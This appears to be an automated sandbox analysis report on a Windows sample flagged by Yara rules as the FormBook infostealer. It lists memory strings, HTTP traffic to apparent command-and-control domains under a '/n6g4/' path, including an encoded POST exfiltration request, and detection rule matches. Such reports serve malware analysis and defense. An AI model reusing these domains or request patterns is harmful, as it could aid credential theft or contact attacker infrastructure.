Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?g
Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591A
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591LMEM
Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/setpc=s&uxe=4421591
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Press
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/calloutprid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https%
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4
Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591LMEM(
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/?gws_rd=ssl
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/?gws_rd=sslLMEMh
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngZ
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/favicon.ico
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/gws_rd=ssl
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/LMEMx
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/S
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowse
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/searchW
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/searchsource=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3kt
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/urlsa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQF
Source: unknown HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.jamesreadtanusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jamesreadtanusa.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 63 39 68 48 6f 51 43 67 61 34 4f 30 7a 35 6a 51 43 6a 59 65 32 75 34 6b 41 71 6f 70 66 77 79 34 7e 77 52 67 35 72 35 6c 47 66 36 73 76 36 54 5a 77 5f 54 68 52 30 41 58 6e 58 35 35 42 67 57 6e 73 56 54 49 73 42 6e 57 4f 39 43 4f 34 4b 30 50 48 59 44 61 73 6d 67 57 43 4d 79 48 44 71 67 33 62 6e 6a 56 76 44 44 47 57 64 54 6d 41 4e 52 59 5a 6e 63 7a 34 43 39 38 39 52 54 4c 54 36 6f 55 39 77 48 6a 44 70 59 4f 59 65 75 36 62 67 31 55 79 72 6b 6f 68 70 71 39 59 4c 6d 59 4e 44 69 66 63 44 58 64 6f 4f 4a 33 52 43 4c 64 6f 79 31 4d 78 71 41 2d 73 31 33 43 30 46 71 55 30 6d 78 4b 49 45 78 4f 39 78 58 38 52 6b 78 35 4a 44 72 32 4f 52 6a 56 36 74 63 43 39 4a 6e 4c 44 78 71 66 73 32 75 55 61 6f 61 72 46 59 42 31 46 72 59 50 44 59 42 58 7a 31 69 47 4d 6e 6b 53 49 59 39 37 52 66 61 52 43 42 63 5f 61 74 58 62 72 63 45 74 59 55 6e 4a 42 55 68 35 30 54 6e 66 66 77 44 34 30 6f 41 6c 7e 70 63 7a 41 6b 4d 61 39 66 6e 47 6e 71 7e 6a 42 65 47 53 63 37 45 6b 4d 67 28 75 7e 37 30 62 37 78 48 4d 34 62 79 33 4a 63 68 74 51 48 43 54 56 36 79 75 37 47 62 7a 38 50 70 62 78 6a 56 50 76 56 28 78 36 51 55 46 74 69 70 43 45 44 4b 37 4f 79 6a 78 6f 62 74 52 49 4a 67 48 78 38 6d 64 66 4c 6b 65 43 64 79 73 50 54 38 45 49 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=c9hHoQCga4O0z5jQCjYe2u4kAqopfwy4~wRg5r5lGf6sv6TZw_ThR0AXnX55BgWnsVTIsBnWO9CO4K0PHYDasmgWCMyHDqg3bnjVvDDGWdTmANRYZncz4C989RTLT6oU9wHjDpYOYeu6bg1Uyrkohpq9YLmYNDifcDXdoOJ3RCLdoy1MxqA-s13C0FqU0mxKIExO9xX8Rkx5JDr2ORjV6tcC9JnLDxqfs2uUaoarFYB1FrYPDYBXz1iGMnkSIY97RfaRCBc_atXbrcEtYUnJBUh50TnffwD40oAl~pczAkMa9fnGnq~jBeGSc7EkMg(u~70b7xHM4by3JchtQHCTV6yu7Gbz8PpbxjVPvV(x6QUFtipCEDK7OyjxobtRIJgHx8mdfLkeCdysPT8EIg).
Source: unknown DNS traffic detected: queries for: www.dems-clicks.com
Source: global traffic HTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznV HTTP/1.1Host: www.dems-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?3fe=T/V9232RQ/ScvLe6YjNRob4pJIAHZz6ft2oS65luWeOdjKzDide1cQ8VyF5HdhGZwVKQ&r2MLI=tjrDPFcXi HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHu HTTP/1.1Host: www.kickball.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?3fe=er/aW89j3eiO30Tth32zztWhmYSSn5MxbIqpkVj2P1EZBbsuTNG7fFHg+MTirOdy738q&r2MLI=tjrDPFcXi HTTP/1.1Host: www.bldh45.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=DeftxpR1OWSh4aZAk/LljwybnwLEUT8BN/DlQaDlT4i7MS32eqTj8UaDk/+v6eXHg19D HTTP/1.1Host: www.properscooter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?3fe=YEAzGNA1BgiQpi8GImtX9JznxcWz/G0oG2K4jwCI3/8B8s5l+/t603YZPdD+BzgPPrJ7&r2MLI=tjrDPFcXi HTTP/1.1Host: www.uspplongee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.iuvRyl9i7D.exe.2e5276c.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: iuvRyl9i7D.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.iuvRyl9i7D.exe.2e5276c.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
